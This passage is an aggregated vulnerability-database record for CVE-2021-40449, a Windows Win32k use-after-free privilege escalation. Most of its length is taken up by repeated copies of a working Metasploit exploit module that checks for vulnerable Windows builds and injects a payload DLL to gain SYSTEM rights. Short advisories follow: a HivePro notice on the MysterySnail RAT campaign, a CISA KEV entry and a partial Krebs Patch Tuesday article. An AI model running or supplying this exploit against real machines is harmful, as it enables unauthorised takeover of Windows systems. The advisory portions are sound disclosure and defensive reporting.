CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) && (build_num_gemversion < Rex::Version.new('10.0.14393.4704')) # Windows 10 v1607\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) && (build_num_gemversion < Rex::Version.new('10.0.10586.9999999')) # Windows 10 v1511\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) && (build_num_gemversion < Rex::Version.new('10.0.10240.19086')) # Windows 10 v1507\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) && (build_num_gemversion < Rex::Version.new('6.3.9600.20144')) # Windows 8.1/Windows Server 2012 R2\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) && (build_num_gemversion < Rex::Version.new('6.2.9200.23489')) # Windows 8/Windows Server 2012\n return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) && (build_num_gemversion < Rex::Version.new('6.1.7601.25740')) # Windows 7/Windows Server 2008 R2\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.0.6003.0')) && (build_num_gemversion < Rex::Version.new('6.0.6003.21251')) # Windows Server 2008/Windows Server 2008 SP2\n return CheckCode::Appears('Vulnerable Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40449', 'CVE-2021-40449.x64.dll'),\n [encoded_payload.length].pack('I<') + encoded_payload\n )\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2021_40449.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "hivepro": [{"lastseen": "2021-10-20T09:19:44", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/10/Microsoft-patches-a-vulnerability-that-was-used-in-MysterySnail-RAT-Campaign_TA202142.pdf>)[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F10%2FMicrosoft-patches-a-vulnerability-that-was-used-in-MysterySnail-RAT-Campaign_TA202142.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )[](<Https://www.hivepro.com/wp-content/uploads/2021/10/Multiple-vulnerabilities-have-been-discovered-in-the-Apache-HTTP-Server_TA202140.pdf>)\n\nAn APT espionage campaign leveraged a zero-day exploit for Microsoft Windows to escalate privileges and obtain access to Windows servers. The exploit chain culminated in the installation of a newly discovered remote access trojan (RAT) called MysterySnail on compromised servers with the purpose of stealing data. The flaw (CVE 2021 40449) was fixed as part of Microsoft&#x27;s October Patch Tuesday upgrades, which were released this week.\n\n#### Vulnerability Details\n\n\n\n#### Actor Details\n\n\n\n#### Indicators of Compromise (IoCs)\n\n\n\n#### Patch Link\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40449>\n\n#### References\n\n<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>", "cvss3": {}, "published": "2021-10-13T08:52:05", "type": "hivepro", "title": "Microsoft patches a vulnerability that was used in MysterySnail RAT Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40449"], "modified": "2021-10-13T08:52:05", "id": "HIVEPRO:19810CA69EE792A741AC657E50CAAAEE", "href": "https://www.hivepro.com/microsoft-patches-a-vulnerability-that-was-used-in-mysterysnail-rat-campaign/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-11-11T03:26:48", "description": "", "cvss3": {}, "published": "2021-11-10T00:00:00", "type": "packetstorm", "title": "Win32k NtGdiResetDC Use-After-Free / Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-40449"], "modified": "2021-11-10T00:00:00", "id": "PACKETSTORM:164926", "href": "https://packetstormsecurity.com/files/164926/Win32k-NtGdiResetDC-Use-After-Free-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::ReflectiveDLLInjection \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n{ \n'Name' => 'Win32k NtGdiResetDC Use After Free Local Privilege Elevation', \n'Description' => %q{ \nA use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be leveraged by \nan attacker to escalate privileges to those of `NT AUTHORITY\\SYSTEM`. The flaw exists due to the fact \nthat this function calls `hdcOpenDCW()`, which performs a user mode callback. During this callback, attackers \ncan call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object \nthat is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle \nwith their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the \nattacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the \nkernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\\SYSTEM. \n \nThis module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however previous versions \nof Windows 10 will likely also work. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'IronHusky', # APT Group who exploited this in the wild \n'Costin Raiu', # Initial reporting on bug at SecureList \n'Boris Larin', # Initial reporting on bug at SecureList \n\"Red Raindrop Team of Qi'anxin Threat Intelligence Center\", # detailed analysis report in Chinese showing how to replicate the vulnerability \n'KaLendsi', # First Public POC targeting Windows 10 build 14393 only, later added support for 17763 \n'ly4k', # GitHub POC adding support for Windows 10 build 17763, PoC used for this module. \n'Grant Willcox' # metasploit module \n], \n'Arch' => [ ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => { \n'EXITFUNC' => 'thread' \n}, \n'Targets' => [ \n[ 'Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)', { 'Arch' => ARCH_X64 } ] \n], \n'Payload' => { \n'DisableNops' => true \n}, \n'References' => [ \n[ 'CVE', '2021-40449' ], \n[ 'URL', 'https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/' ], # Initial report of in the wild exploitation \n[ 'URL', 'https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ' ], # Detailed writeup \n[ 'URL', 'https://github.com/KaLendsi/CVE-2021-40449-Exploit' ], # First public PoC \n[ 'URL', 'https://github.com/ly4k/CallbackHell' ] # Updated PoC this module uses for exploitation. \n], \n'DisclosureDate' => '2021-10-12', \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [ CRASH_OS_RESTARTS, ], \n'Reliability' => [ REPEATABLE_SESSION, ], \n'SideEffects' => [] \n} \n} \n) \n) \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!') \nend \n \nbuild_num_raw = cmd_exec('cmd.exe /c ver') \nbuild_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/) \nif build_num.nil? \nprint_error(\"Couldn't retrieve the target's build number!\") \nelse \nbuild_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0] \nprint_status(\"Target's build number: #{build_num}\") \nend \n \n# see https://docs.microsoft.com/en-us/windows/release-information/ \nunless sysinfo_value =~ /(7|8|8\\.1|10|2008|2012|2016|2019|1803|1809|1903)/ \nreturn CheckCode::Safe('Target is not running a vulnerable version of Windows!') \nend \n \nbuild_num_gemversion = Rex::Version.new(build_num) \n \n# Build numbers taken from https://www.qualys.com/research/security-alerts/2021-10-12/microsoft/ \nif (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) && (build_num_gemversion < Rex::Version.new('10.0.22000.258')) # Windows 11 \nreturn CheckCode::Appears('Vulnerable Windows 11 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) && (build_num_gemversion < Rex::Version.new('10.0.20348.288')) # Windows Server 2022 \nreturn CheckCode::Appears('Vulnerable Windows Server 2022 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) && (build_num_gemversion < Rex::Version.new('10.0.19044.1319')) # Windows 10 21H2 \nreturn CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) && (build_num_gemversion < Rex::Version.new('10.0.19043.1288')) # Windows 10 21H1 \nreturn CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.1288')) # Windows 10 20H2 \nreturn CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.1288')) # Windows 10 20H1 \nreturn CheckCode::Appears('Vulnerable Windows 10 20H1 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1854')) # Windows 10 v1909 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.9999999')) # Windows 10 v1903 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.2237')) # Windows 10 v1809 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.999999')) # Windows 10 v1803 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) && (build_num_gemversion < Rex::Version.new('10.0.16299.999999')) # Windows 10 v1709 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) && (build_num_gemversion < Rex::Version.new('10.0.15063.999999')) # Windows 10 v1703 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) && (build_num_gemversion < Rex::Version.new('10.0.14393.4704')) # Windows 10 v1607 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) && (build_num_gemversion < Rex::Version.new('10.0.10586.9999999')) # Windows 10 v1511 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) && (build_num_gemversion < Rex::Version.new('10.0.10240.19086')) # Windows 10 v1507 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) && (build_num_gemversion < Rex::Version.new('6.3.9600.20144')) # Windows 8.1/Windows Server 2012 R2 \nreturn CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) && (build_num_gemversion < Rex::Version.new('6.2.9200.23489')) # Windows 8/Windows Server 2012 \nreturn CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) && (build_num_gemversion < Rex::Version.new('6.1.7601.25740')) # Windows 7/Windows Server 2008 R2 \nreturn CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!') \nelsif (build_num_gemversion >= Rex::Version.new('6.0.6003.0')) && (build_num_gemversion < Rex::Version.new('6.0.6003.21251')) # Windows Server 2008/Windows Server 2008 SP2 \nreturn CheckCode::Appears('Vulnerable Windows Server 2008/Windows Server 2008 SP2 build detected!') \nelse \nreturn CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!') \nend \nend \n \ndef exploit \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'Running against WOW64 is not supported') \nelsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 \nfail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') \nelsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') \nend \n \nencoded_payload = payload.encoded \nexecute_dll( \n::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40449', 'CVE-2021-40449.x64.dll'), \n[encoded_payload.length].pack('I<') + encoded_payload \n) \n \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164926/cve_2021_40449.rb.txt", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Unspecified vulnerability allows for an authenticated user to escalate privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-17T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Win32k Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449"], "modified": "2021-11-17T00:00:00", "id": "CISA-KEV-CVE-2021-40449", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-21T11:30:23", "description": "A use after free vulnerability exists in the NtGdiResetDC() function of Win32k which can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\\SYSTEM. The flaw exists due to the fact that this function calls hdcOpenDCW(), which performs a user mode callback. During this callback, attackers can call the NtGdiResetDC() function again with the same handle as before, which will result in the PDC object that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle with their own object, before passing execution back to the original NtGdiResetDC() call, which will now use the attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\\SYSTEM. This Metasploit module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however previous versions of Windows 10 will likely also work.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-10T00:00:00", "type": "zdt", "title": "Win32k NtGdiResetDC Use-After-Free / Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449"], "modified": "2021-11-10T00:00:00", "id": "1337DAY-ID-37026", "href": "https://0day.today/exploit/description/37026", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'Win32k NtGdiResetDC Use After Free Local Privilege Elevation',\n 'Description' => %q{\n A use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be leveraged by\n an attacker to escalate privileges to those of `NT AUTHORITY\\SYSTEM`. The flaw exists due to the fact\n that this function calls `hdcOpenDCW()`, which performs a user mode callback. During this callback, attackers\n can call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object\n that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle\n with their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the\n attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the\n kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\\SYSTEM.\n\n This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however previous versions\n of Windows 10 will likely also work.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'IronHusky', # APT Group who exploited this in the wild\n 'Costin Raiu', # Initial reporting on bug at SecureList\n 'Boris Larin', # Initial reporting on bug at SecureList\n \"Red Raindrop Team of Qi'anxin Threat Intelligence Center\", # detailed analysis report in Chinese showing how to replicate the vulnerability\n 'KaLendsi', # First Public POC targeting Windows 10 build 14393 only, later added support for 17763\n 'ly4k', # GitHub POC adding support for Windows 10 build 17763, PoC used for this module.\n 'Grant Willcox' # metasploit module\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n [ 'Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'References' => [\n [ 'CVE', '2021-40449' ],\n [ 'URL', 'https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/' ], # Initial report of in the wild exploitation\n [ 'URL', 'https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ' ], # Detailed writeup\n [ 'URL', 'https://github.com/KaLendsi/CVE-2021-40449-Exploit' ], # First public PoC\n [ 'URL', 'https://github.com/ly4k/CallbackHell' ] # Updated PoC this module uses for exploitation.\n ],\n 'DisclosureDate' => '2021-10-12',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n 'SideEffects' => []\n }\n }\n )\n )\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n build_num_raw = cmd_exec('cmd.exe /c ver')\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)\n if build_num.nil?\n print_error(\"Couldn't retrieve the target's build number!\")\n else\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0]\n print_status(\"Target's build number: #{build_num}\")\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|2008|2012|2016|2019|1803|1809|1903)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n build_num_gemversion = Rex::Version.new(build_num)\n\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2021-10-12/microsoft/\n if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) && (build_num_gemversion < Rex::Version.new('10.0.22000.258')) # Windows 11\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) && (build_num_gemversion < Rex::Version.new('10.0.20348.288')) # Windows Server 2022\n return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) && (build_num_gemversion < Rex::Version.new('10.0.19044.1319')) # Windows 10 21H2\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) && (build_num_gemversion < Rex::Version.new('10.0.19043.1288')) # Windows 10 21H1\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.1288')) # Windows 10 20H2\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.1288')) # Windows 10 20H1\n return CheckCode::Appears('Vulnerable Windows 10 20H1 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1854')) # Windows 10 v1909\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.9999999')) # Windows 10 v1903\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.2237')) # Windows 10 v1809\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.999999')) # Windows 10 v1803\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) && (build_num_gemversion < Rex::Version.new('10.0.16299.999999')) # Windows 10 v1709\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) && (build_num_gemversion < Rex::Version.new('10.0.15063.999999')) # Windows 10 v1703\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) && (build_num_gemversion < Rex::Version.new('10.0.14393.4704')) # Windows 10 v1607\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) && (build_num_gemversion < Rex::Version.new('10.0.10586.9999999')) # Windows 10 v1511\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) && (build_num_gemversion < Rex::Version.new('10.0.10240.19086')) # Windows 10 v1507\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) && (build_num_gemversion < Rex::Version.new('6.3.9600.20144')) # Windows 8.1/Windows Server 2012 R2\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) && (build_num_gemversion < Rex::Version.new('6.2.9200.23489')) # Windows 8/Windows Server 2012\n return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) && (build_num_gemversion < Rex::Version.new('6.1.7601.25740')) # Windows 7/Windows Server 2008 R2\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.0.6003.0')) && (build_num_gemversion < Rex::Version.new('6.0.6003.21251')) # Windows Server 2008/Windows Server 2008 SP2\n return CheckCode::Appears('Vulnerable Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40449', 'CVE-2021-40449.x64.dll'),\n [encoded_payload.length].pack('I<') + encoded_payload\n )\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://0day.today/exploit/37026", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2021-11-02T09:31:12", "description": "**Microsoft **today issued updates to plug more than 70 security holes in its **Windows **operating systems and other software, including one vulnerability that is already being exploited. This month&#x27;s Patch Tuesday also includes security fixes for the newly released **Windows 11** operating system. Separately, **Apple** has released updates for **iOS** and **iPadOS** to address a flaw that is being actively attacked.\n\n\n\nFirstly, Apple has released iOS 15.0.2 and iPadOS 15.0.2 to fix a zero-day vulnerability (CVE-2021-30883) that is being leveraged in active attacks targeting iPhone and iPad users. **Lawrence Abrams** of _Bleeping Computer_ [writes](<https://www.bleepingcomputer.com/news/security/emergency-apple-ios-1502-update-fixes-zero-day-used-in-attacks/>) that the flaw could be used to steal data or install malware, and that soon after Apple patched the bug security researcher [Saar Amar](<https://twitter.com/AmarSaar>) published a [technical writeup and proof-of-concept exploit](<https://saaramar.github.io/IOMFB_integer_overflow_poc/>) derived from reverse engineering Apple&#x27;s patch.\n\nAbrams said the list of impacted Apple devices is quite extensive, affecting older and newer models. If you own an iPad or iPhone -- or any other Apple device -- please [make sure it&#x27;s up to date with the latest security patches](<https://support.apple.com/en-ca/HT204204>).\n\nThree of the weaknesses Microsoft addressed today tackle vulnerabilities rated &quot;**critical**,&quot; meaning that malware or miscreants could exploit them to gain complete, remote control over vulnerable systems -- with little or no help from targets.\n\nOne of the critical bugs concerns [Microsoft Word](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40486>), and two others are remote code execution flaws in **Windows Hyper-V**, the virtualization component built into Windows. [CVE-2021-38672](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38672>) affects Windows 11 and Windows Server 2022; [CVE-2021-40461](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40461>) impacts both Windows 11 and Windows 10 systems, as well as Server versions.\n\nBut as usual, some of the more concerning security weaknesses addressed this month earned Microsoft&#x27;s slightly less dire &quot;**important**&quot; designation, which applies to a vulnerability &quot;whose exploitation could result in compromise of the confidentiality, integrity, or availability of user data, or of the integrity or availability of processing resources.&quot;\n\nThe flaw that&#x27;s under active assault -- [CVE-2021-40449](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40449>) -- is an important &quot;**elevation of privilege**&quot; vulnerability, meaning it can be leveraged in combination with another vulnerability to let attackers run code of their choice as administrator on a vulnerable system.\n\n[CVE-2021-36970](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36970>) is an important spoofing vulnerability in Microsoft\u2019s Windows Print 